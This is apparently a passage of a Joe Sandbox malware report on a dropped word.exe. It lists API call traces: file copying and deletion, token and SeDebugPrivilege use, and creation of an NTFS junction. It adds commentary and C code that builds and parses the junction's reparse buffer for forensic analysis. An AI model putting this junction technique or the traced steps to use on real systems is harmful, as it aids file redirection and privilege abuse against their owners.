                                                                            • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                            • CloseWindowStation.USER32(00000000), ref: 00446497
                                                                            • CloseDesktop.USER32 ref: 0044649E
                                                                            • SetProcessWindowStation.USER32 ref: 004464A9
                                                                            • CloseHandle.KERNEL32(?), ref: 004464B4
                                                                            • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                            • String ID: $default$winsta0
                                                                            • API String ID: 2173856841-1027155976
                                                                            • Opcode ID: 794e07af1c9c1cb68973c2f94f3b6c607b21d5fd27dbfc7dd882fd35dae7c352
                                                                            • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                            • Opcode Fuzzy Hash: 794e07af1c9c1cb68973c2f94f3b6c607b21d5fd27dbfc7dd882fd35dae7c352
                                                                            • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                            APIs
                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\word.exe,?,C:\Users\user\AppData\Roaming\word.exe,004A8E80,C:\Users\user\AppData\Roaming\word.exe,0040F3D2), ref: 0040FFCA
                                                                              • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                              • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                              • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                            • _wcscat.LIBCMT ref: 0044BD96
                                                                            • _wcscat.LIBCMT ref: 0044BDBF
                                                                            • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                            • _wcscpy.LIBCMT ref: 0044BE73
                                                                            • _wcscat.LIBCMT ref: 0044BE85
                                                                            • _wcscat.LIBCMT ref: 0044BE97
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                            • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                            • MoveFileW.KERNEL32 ref: 0044BEF5
                                                                            • CopyFileW.KERNEL32 ref: 0044BF0C
                                                                            • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                            • CopyFileW.KERNEL32 ref: 0044BF2E
                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                            • MoveFileW.KERNEL32 ref: 0044BF51
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 2188072990-1173974218
                                                                            • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                            • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                            • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                            • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                            APIs
                                                                            • __invoke_watson.LIBCMT ref: 004203A4
                                                                              • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
                                                                              • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                                                              • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32 ref: 00417E79
                                                                              • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?), ref: 00417E86
                                                                              • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                                                              • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                                                            • __get_daylight.LIBCMT ref: 004203B0
                                                                            • __invoke_watson.LIBCMT ref: 004203BF
                                                                            • __get_daylight.LIBCMT ref: 004203CB
                                                                            • __invoke_watson.LIBCMT ref: 004203DA
                                                                            • ____lc_codepage_func.LIBCMT ref: 004203E2
                                                                            • _strlen.LIBCMT ref: 00420442
                                                                            • __malloc_crt.LIBCMT ref: 00420449
                                                                            • _strlen.LIBCMT ref: 0042045F
                                                                            • _strcpy_s.LIBCMT ref: 0042046D
                                                                            • __invoke_watson.LIBCMT ref: 00420482
                                                                            • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
                                                                            • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                                                                            • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                                                                              • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
                                                                              • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                              • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                              • Part of subcall function 00413A88: HeapFree.KERNEL32(00000000,00411739,0048C758), ref: 00413AF0
                                                                              • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                            • __invoke_watson.LIBCMT ref: 004205CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
                                                                            • String ID: S\
                                                                            • API String ID: 4084823496-393906132
                                                                            • Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                            • Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
                                                                            • Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                            • Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                            • __swprintf.LIBCMT ref: 00434D91
                                                                            • _wcslen.LIBCMT ref: 00434D9B
                                                                            • _wcslen.LIBCMT ref: 00434DB0
                                                                            • _wcslen.LIBCMT ref: 00434DC5
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                            • _memset.LIBCMT ref: 00434E27
                                                                            • _wcslen.LIBCMT ref: 00434E3C
                                                                            • _wcsncpy.LIBCMT ref: 00434E6F
                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 302090198-3457252023
                                                                            • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                            • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                            • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                            • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
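                                                                            Reading the call sequence of this function: GetFullPathNameW resolves the link path, __swprintf formats it with the `\??\%s` string into an NT object-manager path, CreateDirectoryW creates the link directory, CreateFileW opens it with GENERIC_WRITE (0x40000000), OPEN_EXISTING (3) and FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT (0x02200000), and DeviceIoControl with control code 0x000900A4, which is FSCTL_SET_REPARSE_POINT, writes the reparse data into that directory. This is the standard way to create an NTFS junction (a mount-point reparse point); the RemoveDirectoryW on the other path is consistent with removing the directory again when setting the reparse point fails. The analysis does not show which target the sample linked to (the buffer arguments are recorded as `?`), so none is claimed here. The following C is an added example, not code from the sample or from Joe Sandbox: for an assumed target path it builds the mount-point REPARSE_DATA_BUFFER that such a DeviceIoControl call takes, decodes the control code, and, going one step beyond the listing, parses a buffer back the way a forensic tool reading a $REPARSE_POINT attribute would. It is portable (no windows.h); the Windows call itself appears only in a comment.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constants from the listing: DeviceIoControl control code 0x000900A4 is FSCTL_SET_REPARSE_POINT
   (device type 9 = FILE_DEVICE_FILE_SYSTEM, function 41). Other values are the documented Win32 ones. */
#define FSCTL_SET_REPARSE_POINT     0x000900A4u
#define IO_REPARSE_TAG_MOUNT_POINT  0xA0000003u
#define FLAGS_BACKUP_OPEN_REPARSE   0x02200000u  /* FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT */

enum { RDB_HEADER = 8, MP_FIELDS = 8 };  /* REPARSE_DATA_BUFFER header; MountPointReparseBuffer fixed fields */

/* CTL_CODE decoding: device type in bits 16..31, function number in bits 2..13. */
unsigned ctl_code_device(uint32_t code)   { return (code >> 16) & 0xFFFFu; }
unsigned ctl_code_function(uint32_t code) { return (code >> 2) & 0xFFFu; }

static void     put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v & 0xFF); p[1] = (uint8_t)(v >> 8); }
static void     put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v & 0xFFFF)); put16(p + 2, (uint16_t)(v >> 16)); }
static uint16_t get16(const uint8_t *p)       { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t get32(const uint8_t *p)       { return (uint32_t)get16(p) | ((uint32_t)get16(p + 2) << 16); }

/* Store an ASCII string as UTF-16LE followed by a terminating NUL code unit. */
static void put_utf16(uint8_t *dst, const char *s) {
    size_t n = strlen(s), i;
    for (i = 0; i < n; i++) put16(dst + 2 * i, (uint8_t)s[i]);
    put16(dst + 2 * n, 0);
}

/* Build the mount-point REPARSE_DATA_BUFFER for a junction whose target is `target` (an ASCII Win32 path;
   the path used below is an assumption for the demo). The substitute name gets the same "\??\%s" prefix
   the sample formats; the print name is the bare path. Returns the total size, or 0 if `out` is too small. */
size_t build_mount_point(const char *target, uint8_t *out, size_t cap) {
    char subst[600];
    size_t tlen = strlen(target);
    if (tlen + 5 > sizeof subst) return 0;
    snprintf(subst, sizeof subst, "\\??\\%s", target);
    uint16_t sub_bytes = (uint16_t)(2 * strlen(subst));
    uint16_t prn_bytes = (uint16_t)(2 * tlen);
    uint16_t data_len  = (uint16_t)(MP_FIELDS + sub_bytes + 2 + prn_bytes + 2);  /* both names NUL-terminated */
    size_t total = RDB_HEADER + data_len;
    if (total > cap) return 0;
    memset(out, 0, total);
    put32(out + 0, IO_REPARSE_TAG_MOUNT_POINT);
    put16(out + 4, data_len);                    /* ReparseDataLength */
    put16(out + 6, 0);                           /* Reserved */
    put16(out + 8, 0);                           /* SubstituteNameOffset (bytes into PathBuffer) */
    put16(out + 10, sub_bytes);                  /* SubstituteNameLength */
    put16(out + 12, (uint16_t)(sub_bytes + 2));  /* PrintNameOffset: after the substitute name and its NUL */
    put16(out + 14, prn_bytes);                  /* PrintNameLength */
    uint8_t *path = out + RDB_HEADER + MP_FIELDS;
    put_utf16(path, subst);
    put_utf16(path + sub_bytes + 2, target);
    return total;
}

/* Parse a mount-point buffer (as returned by FSCTL_GET_REPARSE_POINT, or carved from an NTFS $REPARSE_POINT
   attribute) and copy the substitute name out as ASCII. Returns 1 on success, 0 if the buffer is malformed. */
int parse_mount_point(const uint8_t *buf, size_t len, char *subst_out, size_t cap) {
    if (len < RDB_HEADER + MP_FIELDS || get32(buf) != IO_REPARSE_TAG_MOUNT_POINT) return 0;
    uint16_t data_len = get16(buf + 4);
    if (data_len < MP_FIELDS || (size_t)RDB_HEADER + data_len > len) return 0;
    uint16_t so = get16(buf + 8), sl = get16(buf + 10);
    size_t path_bytes = (size_t)data_len - MP_FIELDS;
    if ((sl & 1) || (size_t)so + sl > path_bytes || (size_t)sl / 2 + 1 > cap) return 0;
    const uint8_t *path = buf + RDB_HEADER + MP_FIELDS;
    for (size_t i = 0; i < sl / 2; i++) {
        uint16_t c = get16(path + so + 2 * i);
        subst_out[i] = (c < 0x80) ? (char)c : '?';  /* non-ASCII code units collapsed for the demo */
    }
    subst_out[sl / 2] = '\0';
    return 1;
}

/* Build, parse back, and return the buffer size if the substitute name round-trips; 0 otherwise. */
size_t roundtrip_size(const char *target) {
    uint8_t buf[1400]; char back[600], want[600];
    size_t n = build_mount_point(target, buf, sizeof buf);
    if (!n || !parse_mount_point(buf, n, back, sizeof back)) return 0;
    snprintf(want, sizeof want, "\\??\\%s", target);
    return strcmp(back, want) == 0 ? n : 0;
}

int main(void) {
    uint8_t buf[1400]; char back[600];
    /* Assumed target path for the demo; the sample's real target is not visible in the report. */
    size_t n = build_mount_point("C:\\Users\\user\\AppData\\Roaming", buf, sizeof buf);
    if (!n || !parse_mount_point(buf, n, back, sizeof back)) return 1;
    printf("%zu-byte buffer, tag 0x%08X, substitute name %s\n", n, (unsigned)get32(buf), back);
    /* On Windows this buffer is what the listed call sequence hands to the kernel:
       h = CreateFileW(dir, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FLAGS_BACKUP_OPEN_REPARSE, NULL);
       DeviceIoControl(h, FSCTL_SET_REPARSE_POINT, buf, (DWORD)n, NULL, 0, &ret, NULL); */
    return 0;
}
```

                                                                            For a responder, `fsutil reparsepoint query <directory>` on a live system prints the same tag and substitute name for any directory the sample may have turned into a junction. A junction under the user profile (the sample's dropped copy lives in C:\Users\user\AppData\Roaming) is worth checking, because file operations through it land somewhere other than where the path suggests.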
                                                                            APIs
                                                                              • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                            • GetLastError.KERNEL32 ref: 004644B4
                                                                            • GetCurrentThread.KERNEL32(00000028,00000000,?), ref: 004644C8
                                                                            • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 1312810259-2896544425
                                                                            • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                            • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                            • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                            • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                            • __wsplitpath.LIBCMT ref: 004038B2
                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                            • _wcscpy.LIBCMT ref: 004038C7
                                                                            • _wcscat.LIBCMT ref: 004038DC
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                              • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                            • _wcscpy.LIBCMT ref: 004039C2
                                                                            • _wcslen.LIBCMT ref: 00403A53
                                                                            • _wcslen.LIBCMT ref: 00403AAA
                                                                            Strings
                                                                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                            • Error opening the file, xrefs: 0042B8AC
                                                                            • Unterminated string, xrefs: 0042B9BA
                                                                            • _, xrefs: 00403B48
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                            • API String ID: 4115725249-188983378
                                                                            • Opcode ID: 5c8ff5aa4497b4a6ae766a1db4d44c20e2a53d79bbd935119ae11a08b50845da
                                                                            • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                            • Opcode Fuzzy Hash: 5c8ff5aa4497b4a6ae766a1db4d44c20e2a53d79bbd935119ae11a08b50845da
                                                                            • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                            • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                            • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                            • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                            • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                            • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*
                                                                            • API String ID: 1409584000-438819550
                                                                            • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                            • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                            • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                            • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Timetime$Sleep
                                                                            • String ID: BUTTON
                                                                            • API String ID: 4176159691-3405671355
                                                                            • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                            • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                            • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                            • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,75701228,75701228,?,?,00000000), ref: 00442E40
                                                                            • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                                            • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                                            • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                                            • FindClose.KERNEL32(00000000), ref: 00442F80
                                                                              • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00436D4F
                                                                            • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*
                                                                            • API String ID: 2640511053-438819550
                                                                            • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                            • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                                                                            • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                            • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                                                                            APIs
                                                                              • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                              • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
